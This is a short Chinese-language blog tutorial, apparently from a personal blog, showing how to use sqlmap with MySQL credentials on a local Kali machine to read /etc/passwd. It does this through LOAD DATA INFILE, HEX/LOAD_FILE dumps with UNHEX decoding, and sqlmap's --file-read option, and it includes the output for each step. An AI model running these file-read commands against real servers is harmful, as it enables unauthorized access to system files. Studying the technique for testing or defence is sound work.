昔日

使用sqlmap读取/etc/passwd文件内容

走过岁月......:

1.连接数据库,建立shell交互



root@kaliPC:~# sqlmap -d mysql://test:test@localhost:3306/test --sql-shell



2.读取passwd文件写入数据库



sql-shell> LOAD DATA INFILE '/etc/passwd' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)



3.查看写入内容



sql-shell> select * from testfile



以下为部分截图



备注:如果在实际操作过程遇到二进制编码的问题,可先使用hex()函数导出数据到/tmp/test,然后再LOAD DATA写入数据库



sql-shell> select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test'
select HEX(LOAD_FILE('/etc/passwd')) INTO DUMPFILE '/tmp/test':    'NULL'



此时的test文件中显示为二进制文件


写入数据库二进制文件



sql-shell> LOAD DATA INFILE '/tmp/test' INTO TABLE testfile FIELDS TERMINATED BY 'fuck' (filein)



写入成功后可使用sql-shell直接查看内容



如果有更多需求可结合使用unhex()函数,如



sql-shell> select MID(filein,1,1024) from testfile
[10:06:16] [INFO] fetching SQL SELECT statement query output: 'select MID(filein,1,1024) from testfile'
select MID(filein,1,1024) from testfile [2]:
[*] 
[*] 726F6F743A783A303A303A726F6F743A2F726F6F743A2F62696E2F626173680A6461656D6F6E3A783A313A313A6461656D6F6E3A2F7573722F7362696E3A2F7573722F7362696E2F6E6F6C6F67696E0A62696E3A783A323A323A62696E3A2F62696E3A2F7573722F7362696E2F6E6F6C6F67696E0A7379733A783A333A333A7379733A2F6465763A2F7573722F7362696E2F6E6F6C6F67696E0A73796E633A783A343A36353533343A73796E633A2F62696E3A2F62696E2F73796E630A67616D65733A783A353A36303A67616D65733A2F7573722F67616D65733A2F7573722F7362696E2F6E6F6C6F67696E0A6D616E3A783A363A31323A6D616E3A2F7661722F63616368652F6D616E3A2F7573722F7362696E2F6E6F6C6F67696E0A6C703A783A373A373A6C703A2F7661722F73706F6F6C2F6C70643A2F7573722F7362696E2F6E6F6C6F67696E0A6D61696C3A783A383A383A6D61696C3A2F7661722F6D61696C3A2F7573722F7362696E2F6E6F6C6F67696E0A6E6577733A783A393A393A6E6577733A2F7661722F73706F6F6C2F6E6577733A2F7573722F7362696E2F6E6F6C6F67696E0A757563703A783A31303A31303A757563703A2F7661722F73706F6F6C2F757563703A2F7573722F7362696E2F6E6F6C6F67696E0A70726F78793A783A31333A31333A70726F78793A2F62696E3A2F7573722F7362696E2F6E

sql-shell> select UNHEX(MID(filein,1,1024)) from testfile
[10:06:35] [INFO] fetching SQL SELECT statement query output: 'select UNHEX(MID(filein,1,1024)) from testfile'
select UNHEX(MID(filein,1,1024)) from testfile [2]:
[*] 
[*] root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nr



换个思路,可以使用sqlmap自带选项查询



root@kaliPC:# sqlmap -d mysql://test:test@localhost:3306/test --file-read=/etc/passwd




......


do you want confirmation that the remote file '/etc/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] 
[11:10:30] [INFO] the local file /root/.sqlmap/output/localhost/files/_etc_passwd and the remote file /etc/passwd have the same size (2736b)
files saved to [1]:
[*] /root/.sqlmap/output/localhost/files/_etc_passwd (same file)



可以看出,sqlmap读取了文件把将其保存到了本地路径.

评论

热度(4)

  1. 涵舐渊走过岁月...... 转载了此文字
  2. 昔日走过岁月...... 转载了此文字
  3. Javan's blog走过岁月...... 转载了此文字